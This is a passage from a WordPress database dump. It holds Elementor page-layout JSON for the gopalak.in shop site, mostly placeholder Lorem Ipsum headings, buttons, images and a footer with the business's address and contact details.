widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8026,1423,'_elementor_page_assets','a:0:{}'),(8037,1425,'_elementor_edit_mode','builder'),(8038,1425,'_elementor_template_type','wp-page'),(8039,1425,'_elementor_version','3.7.6'),(8040,1425,'_wp_page_template','elementor_canvas'),(8041,1425,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: 